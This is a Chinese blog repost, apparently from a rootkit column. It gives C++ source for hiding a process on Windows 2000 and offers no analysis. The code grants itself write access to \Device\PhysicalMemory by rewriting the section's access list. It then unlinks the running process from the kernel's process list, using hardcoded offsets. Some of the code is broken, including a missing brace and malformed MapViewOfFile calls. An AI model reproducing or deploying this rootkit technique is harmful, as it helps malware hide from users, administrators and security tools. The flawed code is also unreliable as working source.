在Win2K系统中隐藏进程的VC代码

最新推荐文章于 2022-10-20 15:00:43 发布

转载最新推荐文章于 2022-10-20 15:00:43 发布 · 1.3k 阅读

文章标签：

#attributes #null #object #access #inheritance #callback

rookit 专栏收录该内容

4 篇文章

订阅专栏

本文介绍了一种在Windows 2000系统中隐藏进程的技术实现，通过使用VC++编程，利用内核级API调用修改内存映射权限，进而达到隐藏指定进程的目的。

在Win2K系统中隐藏进程的VC代码

#include < windows.h >

#include < Accctrl.h >

#include < Aclapi.h >

//Powered by barenx

#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;

typedef struct _IO_STATUS_BLOCK

{

NTSTATUS Status;

ULONG Information;

} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING

{

USHORT Length;

USHORT MaximumLength;

PWSTR Buffer;

} UNICODE_STRING, * PUNICODE_STRING;

#define OBJ_INHERIT 0x00000002L

#define OBJ_PERMANENT 0x00000010L

#define OBJ_EXCLUSIVE 0x00000020L

#define OBJ_CASE_INSENSITIVE 0x00000040L

#define OBJ_OPENIF 0x00000080L

#define OBJ_OPENLINK 0x00000100L

#define OBJ_KERNEL_HANDLE 0x00000200L

#define OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES

{

ULONG Length;

HANDLE RootDirectory;

PUNICODE_STRING ObjectName;

ULONG Attributes;

PVOID SecurityDescriptor;

PVOID SecurityQualityOfService;

} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef NTSTATUS (CALLBACK * ZWOPENSECTION)(

OUT PHANDLE SectionHandle,

IN ACCESS_MASK DesiredAccess,

IN POBJECT_ATTRIBUTES ObjectAttributes

);

typedef VOID (CALLBACK * RTLINITUNICODESTRING)(

IN OUT PUNICODE_STRING DestinationString,

IN PCWSTR SourceString

);

RTLINITUNICODESTRING RtlInitUnicodeString;

ZWOPENSECTION ZwOpenSection;

HMODULE g_hNtDLL = NULL;

PVOID g_pMapPhysicalMemory = NULL;

HANDLE g_hMPM = NULL;

BOOL InitNTDLL()

{

g_hNtDLL = LoadLibrary( "ntdll.dll" );

if ( !g_hNtDLL )

{

return FALSE;

}

RtlInitUnicodeString =

(RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");

ZwOpenSection =

(ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");

return TRUE;

}

VOID CloseNTDLL()

{

if(g_hNtDLL != NULL)

{

FreeLibrary(g_hNtDLL);

}

VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)

{

PACL pDacl=NULL;

PACL pNewDacl=NULL;

PSECURITY_DESCRIPTOR pSD=NULL;

DWORD dwRes;

EXPLICIT_ACCESS ea;

if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,

NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS)

{

goto CleanUp;

}

ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));

ea.grfAccessPermissions = SECTION_MAP_WRITE;

ea.grfAccessMode = GRANT_ACCESS;

ea.grfInheritance= NO_INHERITANCE;

ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;

ea.Trustee.TrusteeType = TRUSTEE_IS_USER;

ea.Trustee.ptstrName = "CURRENT_USER";

if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)

{

goto CleanUp;

}

if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)

{

goto CleanUp;

}

CleanUp:

if(pSD)

LocalFree(pSD);

if(pNewDacl)

LocalFree(pNewDacl);

}

HANDLE OpenPhysicalMemory()

{

NTSTATUS status;

UNICODE_STRING physmemString;

OBJECT_ATTRIBUTES attributes;

RtlInitUnicodeString( &physmemString, L"/Device/PhysicalMemory" );

attributes.Length = sizeof(OBJECT_ATTRIBUTES);

attributes.RootDirectory = NULL;

attributes.ObjectName = &physmemString;

attributes.Attributes = 0;

attributes.SecurityDescriptor = NULL;

attributes.SecurityQualityOfService = NULL;

status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);

if(status == STATUS_ACCESS_DENIED){

status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);

SetPhyscialMemorySectionCanBeWrited(g_hMPM);

CloseHandle(g_hMPM);

status =ZwOpenSection(&g_hMPM,SECTION_MAP_WRITE|SECTION_MAP_WRITE,&attributes);

}

if( !NT_SUCCESS( status ))

{

return NULL;

}

g_pMapPhysicalMemory = MapViewOfFile(

g_hMPM,

0x30000,

0x1000);

if( g_pMapPhysicalMemory == NULL )

{

return NULL;

}

return g_hMPM;

}

PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)

{

ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;

PGDE=BaseAddress[VAddr>>22];

if ((PGDE&1)!=0)

{

ULONG tmp=PGDE&0x00000080;

if (tmp!=0)

{

PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);

}

else

{

PGDE=(ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);

PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];

if ((PTE&1)!=0)

{

PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);

UnmapViewOfFile((PVOID)PGDE);

}

else return 0;

}

else return 0;

return (PVOID)PAddr;

}

ULONG GetData(PVOID addr)

{

ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);

PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000);

if (tmp==0)

return 0;

ULONG ret=tmp[(phys & 0xFFF)>>2];

UnmapViewOfFile(tmp);

return ret;

}

BOOL SetData(PVOID addr,ULONG data)

{

ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);

PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);

if (tmp==0)

return FALSE;

tmp[(phys & 0xFFF)>>2]=data;

UnmapViewOfFile(tmp);

return TRUE;

}

BOOL HideProcessAtAll()

{

if (InitNTDLL())

{

if (OpenPhysicalMemory()==0)

{

return FALSE;

}

ULONG thread=GetData((PVOID)0xFFDFF124);

ULONG process=GetData(PVOID(thread+0x22c));

ULONG fw=GetData(PVOID(process+0xa0)),bw=GetData(PVOID(process+0xa4));

SetData(PVOID(fw+4),bw);

SetData(PVOID(bw),fw);

CloseHandle(g_hMPM);

CloseNTDLL();

}

return TRUE;

}